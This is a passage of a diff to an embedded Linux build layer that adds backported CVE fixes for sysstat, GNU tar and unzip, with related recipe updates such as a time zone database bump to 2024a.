10 | 10 | ||
11 | inherit update-rc.d update-alternatives systemd autotools | 11 | inherit update-rc.d update-alternatives systemd autotools |
12 | 12 | ||
13 | SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1 \ | 13 | SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1;protocol=https \ |
14 | file://sysklogd \ | 14 | file://sysklogd \ |
15 | file://0001-fix-one-rarely-reproduced-parallel-build-problem.patch \ | 15 | file://0001-fix-one-rarely-reproduced-parallel-build-problem.patch \ |
16 | " | 16 | " |
diff --git a/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch b/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch new file mode 100644 index 0000000000..972cc8938b --- /dev/null +++ b/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch | |||
@@ -0,0 +1,92 @@ | |||
1 | From 9c4eaf150662ad40607923389d4519bc83b93540 Mon Sep 17 00:00:00 2001 | ||
2 | From: Sebastien <seb@fedora-2.home> | ||
3 | Date: Sat, 15 Oct 2022 14:24:22 +0200 | ||
4 | Subject: [PATCH] Fix size_t overflow in sa_common.c (GHSL-2022-074) | ||
5 | |||
6 | allocate_structures function located in sa_common.c insufficiently | ||
7 | checks bounds before arithmetic multiplication allowing for an | ||
8 | overflow in the size allocated for the buffer representing system | ||
9 | activities. | ||
10 | |||
11 | This patch checks that the post-multiplied value is not greater than | ||
12 | UINT_MAX. | ||
13 | |||
14 | Signed-off-by: Sebastien <seb@fedora-2.home> | ||
15 | |||
16 | Upstream-Status: Backport [https://github.com/sysstat/sysstat/commit/9c4eaf150662ad40607923389d4519bc83b93540] | ||
17 | CVE : CVE-2022-39377 | ||
18 | Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> | ||
19 | --- | ||
20 | common.c | 25 +++++++++++++++++++++++++ | ||
21 | common.h | 2 ++ | ||
22 | sa_common.c | 6 ++++++ | ||
23 | 3 files changed, 33 insertions(+) | ||
24 | |||
25 | diff --git a/common.c b/common.c | ||
26 | index ddfe75d..28d475e 100644 | ||
27 | --- a/common.c | ||
28 | +++ b/common.c | ||
29 | @@ -1528,4 +1528,29 @@ int parse_values(char *strargv, unsigned char bitmap[], int max_val, const char | ||
30 | |||
31 | return 0; | ||
32 | } | ||
33 | + | ||
34 | +/* | ||
35 | + *************************************************************************** | ||
36 | + * Check if the multiplication of the 3 values may be greater than UINT_MAX. | ||
37 | + * | ||
38 | + * IN: | ||
39 | + * @val1 First value. | ||
40 | + * @val2 Second value. | ||
41 | + * @val3 Third value. | ||
42 | + *************************************************************************** | ||
43 | + */ | ||
44 | +void check_overflow(size_t val1, size_t val2, size_t val3) | ||
45 | +{ | ||
46 | + if ((unsigned long long) val1 * | ||
47 | + (unsigned long long) val2 * | ||
48 | + (unsigned long long) val3 > UINT_MAX) { | ||
49 | +#ifdef DEBUG | ||
50 | + fprintf(stderr, "%s: Overflow detected (%llu). Aborting...\n", | ||
51 | + __FUNCTION__, | ||
52 | + (unsigned long long) val1 * (unsigned long long) val2 * (unsigned long long) val3); | ||
53 | +#endif | ||
54 | + exit(4); | ||
55 | + } | ||
56 | +} | ||
57 | + | ||
58 | #endif /* SOURCE_SADC undefined */ | ||
59 | diff --git a/common.h b/common.h | ||
60 | index 86905ba..75f837a 100644 | ||
61 | --- a/common.h | ||
62 | +++ b/common.h | ||
63 | @@ -249,6 +249,8 @@ int get_wwnid_from_pretty | ||
64 | (char *, unsigned long long *, unsigned int *); | ||
65 | |||
66 | #ifndef SOURCE_SADC | ||
67 | +void check_overflow | ||
68 | + (size_t, size_t, size_t); | ||
69 | int count_bits | ||
70 | (void *, int); | ||
71 | int count_csvalues | ||
72 | diff --git a/sa_common.c b/sa_common.c | ||
73 | index 8a03099..ff90c1f 100644 | ||
74 | --- a/sa_common.c | ||
75 | +++ b/sa_common.c | ||
76 | @@ -452,7 +452,13 @@ void allocate_structures(struct activity *act[]) | ||
77 | int i, j; | ||
78 | |||
79 | for (i = 0; i < NR_ACT; i++) { | ||
80 | + | ||
81 | if (act[i]->nr_ini > 0) { | ||
82 | + | ||
83 | + /* Look for a possible overflow */ | ||
84 | + check_overflow((size_t) act[i]->msize, (size_t) act[i]->nr_ini, | ||
85 | + (size_t) act[i]->nr2); | ||
86 | + | ||
87 | for (j = 0; j < 3; j++) { | ||
88 | SREALLOC(act[i]->buf[j], void, | ||
89 | (size_t) act[i]->msize * (size_t) act[i]->nr_ini * (size_t) act[i]->nr2); | ||
90 | -- | ||
91 | 2.25.1 | ||
92 | |||
diff --git a/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch b/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch new file mode 100644 index 0000000000..9a27945a8b --- /dev/null +++ b/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch | |||
@@ -0,0 +1,46 @@ | |||
1 | Origin: https://github.com/opencontainers/runc/commit/6f8dc568e6ab072bb8205b732f04e685bf9237c0 | ||
2 | Reviewed-by: Sylvain Beucler <beuc@debian.org> | ||
3 | Last-Update: 2023-02-18 | ||
4 | |||
5 | From 954ff2e2673cef48f0ed44668c466eab041db387 Mon Sep 17 00:00:00 2001 | ||
6 | From: Pavel Kopylov <pkopylov@cloudlinux.com> | ||
7 | Date: Wed, 17 May 2023 11:33:45 +0200 | ||
8 | Subject: [PATCH] Fix an overflow which is still possible for some values. | ||
9 | |||
10 | CVE: CVE-2023-33204 | ||
11 | Upstream-Status: Backport [ upstream: https://github.com/sysstat/sysstat/commit/6f8dc568e6ab072bb8205b732f04e685bf9237c0 | ||
12 | debian: http://security.debian.org/debian-security/pool/updates/main/s/sysstat/sysstat_12.0.3-2+deb10u2.debian.tar.xz ] | ||
13 | Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com> | ||
14 | |||
15 | --- | ||
16 | common.c | 7 +++++-- | ||
17 | 1 file changed, 5 insertions(+), 2 deletions(-) | ||
18 | |||
19 | Index: sysstat-12.0.3/common.c | ||
20 | =================================================================== | ||
21 | --- sysstat-12.0.3.orig/common.c | ||
22 | +++ sysstat-12.0.3/common.c | ||
23 | @@ -1449,15 +1449,16 @@ int parse_values(char *strargv, unsigned | ||
24 | */ | ||
25 | void check_overflow(size_t val1, size_t val2, size_t val3) | ||
26 | { | ||
27 | - if ((unsigned long long) val1 * | ||
28 | - (unsigned long long) val2 * | ||
29 | - (unsigned long long) val3 > UINT_MAX) { | ||
30 | + if ((val1 != 0) && (val2 != 0) && (val3 != 0) && | ||
31 | + (((unsigned long long) UINT_MAX / (unsigned long long) val1 < | ||
32 | + (unsigned long long) val2) || | ||
33 | + ((unsigned long long) UINT_MAX / ((unsigned long long) val1 * (unsigned long long) val2) < | ||
34 | + (unsigned long long) val3))) { | ||
35 | #ifdef DEBUG | ||
36 | - fprintf(stderr, "%s: Overflow detected (%llu). Aborting...\n", | ||
37 | - __FUNCTION__, | ||
38 | - (unsigned long long) val1 * (unsigned long long) val2 * (unsigned long long) val3); | ||
39 | + fprintf(stderr, "%s: Overflow detected (%u,%u,%u). Aborting...\n", | ||
40 | + __FUNCTION__, val1, val2, val3); | ||
41 | #endif | ||
42 | - exit(4); | ||
43 | + exit(4); | ||
44 | } | ||
45 | } | ||
46 | |||
diff --git a/meta/recipes-extended/sysstat/sysstat_12.2.1.bb b/meta/recipes-extended/sysstat/sysstat_12.2.1.bb index 2a90f89d25..ac7b898db9 100644 --- a/meta/recipes-extended/sysstat/sysstat_12.2.1.bb +++ b/meta/recipes-extended/sysstat/sysstat_12.2.1.bb | |||
@@ -2,7 +2,10 @@ require sysstat.inc | |||
2 | 2 | ||
3 | LIC_FILES_CHKSUM = "file://COPYING;md5=a23a74b3f4caf9616230789d94217acb" | 3 | LIC_FILES_CHKSUM = "file://COPYING;md5=a23a74b3f4caf9616230789d94217acb" |
4 | 4 | ||
5 | SRC_URI += "file://0001-configure.in-remove-check-for-chkconfig.patch" | 5 | SRC_URI += "file://0001-configure.in-remove-check-for-chkconfig.patch \ |
6 | file://CVE-2022-39377.patch \ | ||
7 | file://CVE-2023-33204.patch \ | ||
8 | " | ||
6 | 9 | ||
7 | SRC_URI[md5sum] = "9dfff5fac24e35bd92fb7896debf2ffb" | 10 | SRC_URI[md5sum] = "9dfff5fac24e35bd92fb7896debf2ffb" |
8 | SRC_URI[sha256sum] = "8edb0e19b514ac560a098a02933a4735b881296d61014db89bf80f05dd7a4732" | 11 | SRC_URI[sha256sum] = "8edb0e19b514ac560a098a02933a4735b881296d61014db89bf80f05dd7a4732" |
diff --git a/meta/recipes-extended/tar/tar/CVE-2021-20193.patch b/meta/recipes-extended/tar/tar/CVE-2021-20193.patch new file mode 100644 index 0000000000..89e8e20844 --- /dev/null +++ b/meta/recipes-extended/tar/tar/CVE-2021-20193.patch | |||
@@ -0,0 +1,133 @@ | |||
1 | From d9d4435692150fa8ff68e1b1a473d187cc3fd777 Mon Sep 17 00:00:00 2001 | ||
2 | From: Sergey Poznyakoff <gray@gnu.org> | ||
3 | Date: Sun, 17 Jan 2021 20:41:11 +0200 | ||
4 | Subject: Fix memory leak in read_header | ||
5 | |||
6 | Bug reported in https://savannah.gnu.org/bugs/?59897 | ||
7 | |||
8 | * src/list.c (read_header): Don't return directly from the loop. | ||
9 | Instead set the status and break. Return the status. Free | ||
10 | next_long_name and next_long_link before returning. | ||
11 | |||
12 | CVE: CVE-2021-20193 | ||
13 | Upstream-Status: Backport | ||
14 | [https://git.savannah.gnu.org/cgit/tar.git/patch/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777] | ||
15 | Signed-off-by: Anatol Belski <anbelski@linux.microsoft.com> | ||
16 | |||
17 | --- | ||
18 | src/list.c | 40 ++++++++++++++++++++++++++++------------ | ||
19 | 1 file changed, 28 insertions(+), 12 deletions(-) | ||
20 | |||
21 | diff --git a/src/list.c b/src/list.c | ||
22 | index e40a5c8..d7ef441 100644 | ||
23 | --- a/src/list.c | ||
24 | +++ b/src/list.c | ||
25 | @@ -408,26 +408,27 @@ read_header (union block **return_block, struct tar_stat_info *info, | ||
26 | enum read_header_mode mode) | ||
27 | { | ||
28 | union block *header; | ||
29 | - union block *header_copy; | ||
30 | char *bp; | ||
31 | union block *data_block; | ||
32 | size_t size, written; | ||
33 | - union block *next_long_name = 0; | ||
34 | - union block *next_long_link = 0; | ||
35 | + union block *next_long_name = NULL; | ||
36 | + union block *next_long_link = NULL; | ||
37 | size_t next_long_name_blocks = 0; | ||
38 | size_t next_long_link_blocks = 0; | ||
39 | - | ||
40 | + enum read_header status = HEADER_SUCCESS; | ||
41 | + | ||
42 | while (1) | ||
43 | { | ||
44 | - enum read_header status; | ||
45 | - | ||
46 | header = find_next_block (); | ||
47 | *return_block = header; | ||
48 | if (!header) | ||
49 | - return HEADER_END_OF_FILE; | ||
50 | + { | ||
51 | + status = HEADER_END_OF_FILE; | ||
52 | + break; | ||
53 | + } | ||
54 | |||
55 | if ((status = tar_checksum (header, false)) != HEADER_SUCCESS) | ||
56 | - return status; | ||
57 | + break; | ||
58 | |||
59 | /* Good block. Decode file size and return. */ | ||
60 | |||
61 | @@ -437,7 +438,10 @@ read_header (union block **return_block, struct tar_stat_info *info, | ||
62 | { | ||
63 | info->stat.st_size = OFF_FROM_HEADER (header->header.size); | ||
64 | if (info->stat.st_size < 0) | ||
65 | - return HEADER_FAILURE; | ||
66 | + { | ||
67 | + status = HEADER_FAILURE; | ||
68 | + break; | ||
69 | + } | ||
70 | } | ||
71 | |||
72 | if (header->header.typeflag == GNUTYPE_LONGNAME | ||
73 | @@ -447,10 +451,14 @@ read_header (union block **return_block, struct tar_stat_info *info, | ||
74 | || header->header.typeflag == SOLARIS_XHDTYPE) | ||
75 | { | ||
76 | if (mode == read_header_x_raw) | ||
77 | - return HEADER_SUCCESS_EXTENDED; | ||
78 | + { | ||
79 | + status = HEADER_SUCCESS_EXTENDED; | ||
80 | + break; | ||
81 | + } | ||
82 | else if (header->header.typeflag == GNUTYPE_LONGNAME | ||
83 | || header->header.typeflag == GNUTYPE_LONGLINK) | ||
84 | { | ||
85 | + union block *header_copy; | ||
86 | size_t name_size = info->stat.st_size; | ||
87 | size_t n = name_size % BLOCKSIZE; | ||
88 | size = name_size + BLOCKSIZE; | ||
89 | @@ -517,7 +525,10 @@ read_header (union block **return_block, struct tar_stat_info *info, | ||
90 | xheader_decode_global (&xhdr); | ||
91 | xheader_destroy (&xhdr); | ||
92 | if (mode == read_header_x_global) | ||
93 | - return HEADER_SUCCESS_EXTENDED; | ||
94 | + { | ||
95 | + status = HEADER_SUCCESS_EXTENDED; | ||
96 | + break; | ||
97 | + } | ||
98 | } | ||
99 | |||
100 | /* Loop! */ | ||
101 | @@ -536,6 +547,7 @@ read_header (union block **return_block, struct tar_stat_info *info, | ||
102 | name = next_long_name->buffer + BLOCKSIZE; | ||
103 | recent_long_name = next_long_name; | ||
104 | recent_long_name_blocks = next_long_name_blocks; | ||
105 | + next_long_name = NULL; | ||
106 | } | ||
107 | else | ||
108 | { | ||
109 | @@ -567,6 +579,7 @@ read_header (union block **return_block, struct tar_stat_info *info, | ||
110 | name = next_long_link->buffer + BLOCKSIZE; | ||
111 | recent_long_link = next_long_link; | ||
112 | recent_long_link_blocks = next_long_link_blocks; | ||
113 | + next_long_link = NULL; | ||
114 | } | ||
115 | else | ||
116 | { | ||
117 | @@ -578,9 +591,12 @@ read_header (union block **return_block, struct tar_stat_info *info, | ||
118 | } | ||
119 | assign_string (&info->link_name, name); | ||
120 | |||
121 | - return HEADER_SUCCESS; | ||
122 | + break; | ||
123 | } | ||
124 | } | ||
125 | + free (next_long_name); | ||
126 | + free (next_long_link); | ||
127 | + return status; | ||
128 | } | ||
129 | |||
130 | #define ISOCTAL(c) ((c)>='0'&&(c)<='7') | ||
131 | -- | ||
132 | cgit v1.2.1 | ||
133 | |||
diff --git a/meta/recipes-extended/tar/tar/CVE-2022-48303.patch b/meta/recipes-extended/tar/tar/CVE-2022-48303.patch new file mode 100644 index 0000000000..b2f40f3e64 --- /dev/null +++ b/meta/recipes-extended/tar/tar/CVE-2022-48303.patch | |||
@@ -0,0 +1,43 @@ | |||
1 | From 3da78400eafcccb97e2f2fd4b227ea40d794ede8 Mon Sep 17 00:00:00 2001 | ||
2 | From: Sergey Poznyakoff <gray@gnu.org> | ||
3 | Date: Sat, 11 Feb 2023 11:57:39 +0200 | ||
4 | Subject: Fix boundary checking in base-256 decoder | ||
5 | |||
6 | * src/list.c (from_header): Base-256 encoding is at least 2 bytes | ||
7 | long. | ||
8 | |||
9 | Upstream-Status: Backport [see reference below] | ||
10 | CVE: CVE-2022-48303 | ||
11 | |||
12 | Reference to upstream patch: | ||
13 | https://savannah.gnu.org/bugs/?62387 | ||
14 | https://git.savannah.gnu.org/cgit/tar.git/patch/src/list.c?id=3da78400eafcccb97e2f2fd4b227ea40d794ede8 | ||
15 | |||
16 | Signed-off-by: Rodolfo Quesada Zumbado <rodolfo.zumbado@windriver.com> | ||
17 | Signed-off-by: Joe Slater <joe.slater@windriver.com> | ||
18 | --- | ||
19 | src/list.c | 5 +++-- | ||
20 | 1 file changed, 3 insertions(+), 2 deletions(-)Signed-off-by: Rodolfo Quesada Zumbado <rodolfo.zumbado@windriver.com> | ||
21 | |||
22 | |||
23 | (limited to 'src/list.c') | ||
24 | |||
25 | diff --git a/src/list.c b/src/list.c | ||
26 | index 9fafc42..86bcfdd 100644 | ||
27 | --- a/src/list.c | ||
28 | +++ b/src/list.c | ||
29 | @@ -881,8 +881,9 @@ from_header (char const *where0, size_t digs, char const *type, | ||
30 | where++; | ||
31 | } | ||
32 | } | ||
33 | - else if (*where == '\200' /* positive base-256 */ | ||
34 | - || *where == '\377' /* negative base-256 */) | ||
35 | + else if (where <= lim - 2 | ||
36 | + && (*where == '\200' /* positive base-256 */ | ||
37 | + || *where == '\377' /* negative base-256 */)) | ||
38 | { | ||
39 | /* Parse base-256 output. A nonnegative number N is | ||
40 | represented as (256**DIGS)/2 + N; a negative number -N is | ||
41 | -- | ||
42 | cgit v1.1 | ||
43 | |||
diff --git a/meta/recipes-extended/tar/tar/CVE-2023-39804.patch b/meta/recipes-extended/tar/tar/CVE-2023-39804.patch new file mode 100644 index 0000000000..f550928540 --- /dev/null +++ b/meta/recipes-extended/tar/tar/CVE-2023-39804.patch | |||
@@ -0,0 +1,64 @@ | |||
1 | From a339f05cd269013fa133d2f148d73f6f7d4247e4 Mon Sep 17 00:00:00 2001 | ||
2 | From: Sergey Poznyakoff <gray@gnu.org> | ||
3 | Date: Sat, 28 Aug 2021 16:02:12 +0300 | ||
4 | Subject: Fix handling of extended header prefixes | ||
5 | |||
6 | * src/xheader.c (locate_handler): Recognize prefix keywords only | ||
7 | when followed by a dot. | ||
8 | (xattr_decoder): Use xmalloc/xstrdup instead of alloc | ||
9 | |||
10 | Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4] | ||
11 | CVE: CVE-2023-39804 | ||
12 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
13 | --- | ||
14 | src/xheader.c | 17 +++++++++-------- | ||
15 | 1 file changed, 9 insertions(+), 8 deletions(-) | ||
16 | |||
17 | diff --git a/src/xheader.c b/src/xheader.c | ||
18 | index 4f8b2b2..3cd694d 100644 | ||
19 | --- a/src/xheader.c | ||
20 | +++ b/src/xheader.c | ||
21 | @@ -637,11 +637,11 @@ static struct xhdr_tab const * | ||
22 | locate_handler (char const *keyword) | ||
23 | { | ||
24 | struct xhdr_tab const *p; | ||
25 | - | ||
26 | for (p = xhdr_tab; p->keyword; p++) | ||
27 | if (p->prefix) | ||
28 | { | ||
29 | - if (strncmp (p->keyword, keyword, strlen(p->keyword)) == 0) | ||
30 | + size_t kwlen = strlen (p->keyword); | ||
31 | + if (keyword[kwlen] == '.' && strncmp (p->keyword, keyword, kwlen) == 0) | ||
32 | return p; | ||
33 | } | ||
34 | else | ||
35 | @@ -1716,19 +1716,20 @@ xattr_decoder (struct tar_stat_info *st, | ||
36 | char const *keyword, char const *arg, size_t size) | ||
37 | { | ||
38 | char *xstr, *xkey; | ||
39 | - | ||
40 | + | ||
41 | /* copy keyword */ | ||
42 | - size_t klen_raw = strlen (keyword); | ||
43 | - xkey = alloca (klen_raw + 1); | ||
44 | - memcpy (xkey, keyword, klen_raw + 1) /* including null-terminating */; | ||
45 | + xkey = xstrdup (keyword); | ||
46 | |||
47 | /* copy value */ | ||
48 | - xstr = alloca (size + 1); | ||
49 | + xstr = xmalloc (size + 1); | ||
50 | memcpy (xstr, arg, size + 1); /* separator included, for GNU tar '\n' */; | ||
51 | |||
52 | xattr_decode_keyword (xkey); | ||
53 | |||
54 | - xheader_xattr_add (st, xkey + strlen("SCHILY.xattr."), xstr, size); | ||
55 | + xheader_xattr_add (st, xkey + strlen ("SCHILY.xattr."), xstr, size); | ||
56 | + | ||
57 | + free (xkey); | ||
58 | + free (xstr); | ||
59 | } | ||
60 | |||
61 | static void | ||
62 | -- | ||
63 | cgit v1.1 | ||
64 | |||
diff --git a/meta/recipes-extended/tar/tar_1.32.bb b/meta/recipes-extended/tar/tar_1.32.bb index ebe6cb0dbd..9297480e85 100644 --- a/meta/recipes-extended/tar/tar_1.32.bb +++ b/meta/recipes-extended/tar/tar_1.32.bb | |||
@@ -6,8 +6,13 @@ SECTION = "base" | |||
6 | LICENSE = "GPLv3" | 6 | LICENSE = "GPLv3" |
7 | LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504" | 7 | LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504" |
8 | 8 | ||
9 | PR = "r1" | ||
10 | |||
9 | SRC_URI = "${GNU_MIRROR}/tar/tar-${PV}.tar.bz2 \ | 11 | SRC_URI = "${GNU_MIRROR}/tar/tar-${PV}.tar.bz2 \ |
10 | file://musl_dirent.patch \ | 12 | file://musl_dirent.patch \ |
13 | file://CVE-2021-20193.patch \ | ||
14 | file://CVE-2022-48303.patch \ | ||
15 | file://CVE-2023-39804.patch \ | ||
11 | " | 16 | " |
12 | 17 | ||
13 | SRC_URI[md5sum] = "17917356fff5cb4bd3cd5a6c3e727b05" | 18 | SRC_URI[md5sum] = "17917356fff5cb4bd3cd5a6c3e727b05" |
@@ -64,3 +69,7 @@ PROVIDES_append_class-native = " tar-replacement-native" | |||
64 | NATIVE_PACKAGE_PATH_SUFFIX = "/${PN}" | 69 | NATIVE_PACKAGE_PATH_SUFFIX = "/${PN}" |
65 | 70 | ||
66 | BBCLASSEXTEND = "native nativesdk" | 71 | BBCLASSEXTEND = "native nativesdk" |
72 | |||
73 | # Avoid false positives from CVEs in node-tar package | ||
74 | # For example CVE-2021-{32803,32804,37701,37712,37713} | ||
75 | CVE_PRODUCT = "gnu:tar" | ||
diff --git a/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb b/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb index ec04bfe390..a942ac2991 100644 --- a/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb +++ b/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Fake version of the texinfo utility suite" | 1 | SUMMARY = "Fake version of the texinfo utility suite" |
2 | SECTION = "console/utils" | 2 | SECTION = "console/utils" |
3 | DESCRIPTION = "${SUMMARY}" | ||
3 | LICENSE = "MIT" | 4 | LICENSE = "MIT" |
4 | LIC_FILES_CHKSUM = "file://COPYING;md5=d6bb62e73ca8b901d3f2e9d71542f4bb" | 5 | LIC_FILES_CHKSUM = "file://COPYING;md5=d6bb62e73ca8b901d3f2e9d71542f4bb" |
5 | DEPENDS = "" | 6 | DEPENDS = "" |
diff --git a/meta/recipes-extended/timezone/timezone.inc b/meta/recipes-extended/timezone/timezone.inc index a89560b424..46bc1b794e 100644 --- a/meta/recipes-extended/timezone/timezone.inc +++ b/meta/recipes-extended/timezone/timezone.inc | |||
@@ -3,10 +3,10 @@ DESCRIPTION = "The Time Zone Database contains code and data that represent \ | |||
3 | the history of local time for many representative locations around the globe." | 3 | the history of local time for many representative locations around the globe." |
4 | HOMEPAGE = "http://www.iana.org/time-zones" | 4 | HOMEPAGE = "http://www.iana.org/time-zones" |
5 | SECTION = "base" | 5 | SECTION = "base" |
6 | LICENSE = "PD & BSD & BSD-3-Clause" | 6 | LICENSE = "PD & BSD-3-Clause" |
7 | LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba" | 7 | LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba" |
8 | 8 | ||
9 | PV = "2021a" | 9 | PV = "2024a" |
10 | 10 | ||
11 | SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode \ | 11 | SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode \ |
12 | http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata \ | 12 | http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata \ |
@@ -14,5 +14,5 @@ SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz | |||
14 | 14 | ||
15 | UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones" | 15 | UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones" |
16 | 16 | ||
17 | SRC_URI[tzcode.sha256sum] = "eb46bfa124b5b6bd13d61a609bfde8351bd192894708d33aa06e5c1e255802d0" | 17 | SRC_URI[tzcode.sha256sum] = "80072894adff5a458f1d143e16e4ca1d8b2a122c9c5399da482cb68cba6a1ff8" |
18 | SRC_URI[tzdata.sha256sum] = "39e7d2ba08c68cbaefc8de3227aab0dec2521be8042cf56855f7dc3a9fb14e08" | 18 | SRC_URI[tzdata.sha256sum] = "0d0434459acbd2059a7a8da1f3304a84a86591f6ed69c6248fffa502b6edffe3" |
diff --git a/meta/recipes-extended/timezone/tzdata.bb b/meta/recipes-extended/timezone/tzdata.bb index e6a0655afe..cc6206ac70 100644 --- a/meta/recipes-extended/timezone/tzdata.bb +++ b/meta/recipes-extended/timezone/tzdata.bb | |||
@@ -19,13 +19,17 @@ TZONES= "africa antarctica asia australasia europe northamerica southamerica \ | |||
19 | " | 19 | " |
20 | # pacificnew | 20 | # pacificnew |
21 | 21 | ||
22 | # "slim" is the default since 2020b | ||
23 | # "fat" is needed by e.g. MariaDB's mysql_tzinfo_to_sql | ||
24 | ZIC_FMT ?= "slim" | ||
25 | |||
22 | do_compile () { | 26 | do_compile () { |
23 | for zone in ${TZONES}; do \ | 27 | for zone in ${TZONES}; do \ |
24 | ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo -L /dev/null \ | 28 | ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo -L /dev/null \ |
25 | ${S}/${zone} ; \ | 29 | ${S}/${zone} ; \ |
26 | ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo/posix -L /dev/null \ | 30 | ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo/posix -L /dev/null \ |
27 | ${S}/${zone} ; \ | 31 | ${S}/${zone} ; \ |
28 | ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo/right -L ${S}/leapseconds \ | 32 | ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo/right -L ${S}/leapseconds \ |
29 | ${S}/${zone} ; \ | 33 | ${S}/${zone} ; \ |
30 | done | 34 | done |
31 | } | 35 | } |
diff --git a/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch b/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch new file mode 100644 index 0000000000..6ba2b879a3 --- /dev/null +++ b/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch | |||
@@ -0,0 +1,67 @@ | |||
1 | From 731d698377dbd1f5b1b90efeb8094602ed59fc40 Mon Sep 17 00:00:00 2001 | ||
2 | From: Nils Bars <nils.bars@t-online.de> | ||
3 | Date: Mon, 17 Jan 2022 16:53:16 +0000 | ||
4 | Subject: [PATCH] Fix null pointer dereference and use of uninitialized data | ||
5 | |||
6 | This fixes a bug that causes use of uninitialized heap data if `readbuf` fails | ||
7 | to read as many bytes as indicated by the extra field length attribute. | ||
8 | Furthermore, this fixes a null pointer dereference if an archive contains an | ||
9 | `EF_UNIPATH` extra field but does not have a filename set. | ||
10 | --- | ||
11 | fileio.c | 5 ++++- | ||
12 | process.c | 6 +++++- | ||
13 | 2 files changed, 9 insertions(+), 2 deletions(-) | ||
14 | --- | ||
15 | |||
16 | Patch from: | ||
17 | https://bugs.launchpad.net/ubuntu/+source/unzip/+bug/1957077 | ||
18 | https://launchpadlibrarian.net/580782282/0001-Fix-null-pointer-dereference-and-use-of-uninitialized-data.patch | ||
19 | Regenerated to apply without offsets. | ||
20 | |||
21 | CVE: CVE-2021-4217 | ||
22 | |||
23 | Upstream-Status: Pending [infozip upstream inactive] | ||
24 | |||
25 | Signed-off-by: Joe Slater <joe.slater@windriver.com> | ||
26 | |||
27 | |||
28 | diff --git a/fileio.c b/fileio.c | ||
29 | index 14460f3..1dc319e 100644 | ||
30 | --- a/fileio.c | ||
31 | +++ b/fileio.c | ||
32 | @@ -2301,8 +2301,11 @@ int do_string(__G__ length, option) /* return PK-type error code */ | ||
33 | seek_zipf(__G__ G.cur_zipfile_bufstart - G.extra_bytes + | ||
34 | (G.inptr-G.inbuf) + length); | ||
35 | } else { | ||
36 | - if (readbuf(__G__ (char *)G.extra_field, length) == 0) | ||
37 | + unsigned bytes_read = readbuf(__G__ (char *)G.extra_field, length); | ||
38 | + if (bytes_read == 0) | ||
39 | return PK_EOF; | ||
40 | + if (bytes_read != length) | ||
41 | + return PK_ERR; | ||
42 | /* Looks like here is where extra fields are read */ | ||
43 | if (getZip64Data(__G__ G.extra_field, length) != PK_COOL) | ||
44 | { | ||
45 | diff --git a/process.c b/process.c | ||
46 | index 5f8f6c6..de843a5 100644 | ||
47 | --- a/process.c | ||
48 | +++ b/process.c | ||
49 | @@ -2058,10 +2058,14 @@ int getUnicodeData(__G__ ef_buf, ef_len) | ||
50 | G.unipath_checksum = makelong(offset + ef_buf); | ||
51 | offset += 4; | ||
52 | |||
53 | + if (!G.filename_full) { | ||
54 | + /* Check if we have a unicode extra section but no filename set */ | ||
55 | + return PK_ERR; | ||
56 | + } | ||
57 | + | ||
58 | /* | ||
59 | * Compute 32-bit crc | ||
60 | */ | ||
61 | - | ||
62 | chksum = crc32(chksum, (uch *)(G.filename_full), | ||
63 | strlen(G.filename_full)); | ||
64 | |||
65 | -- | ||
66 | 2.32.0 | ||
67 | |||
diff --git a/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch b/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch new file mode 100644 index 0000000000..1c1e120deb --- /dev/null +++ b/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch | |||
@@ -0,0 +1,39 @@ | |||
1 | https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010355 | ||
2 | |||
3 | CVE: CVE-2022-0529 | ||
4 | Upstream-Status: Inactive-Upstream [need a new release] | ||
5 | |||
6 | diff --git a/process.c b/process.c | ||
7 | index d2a846e..99b9c7b 100644 | ||
8 | --- a/process.c | ||
9 | +++ b/process.c | ||
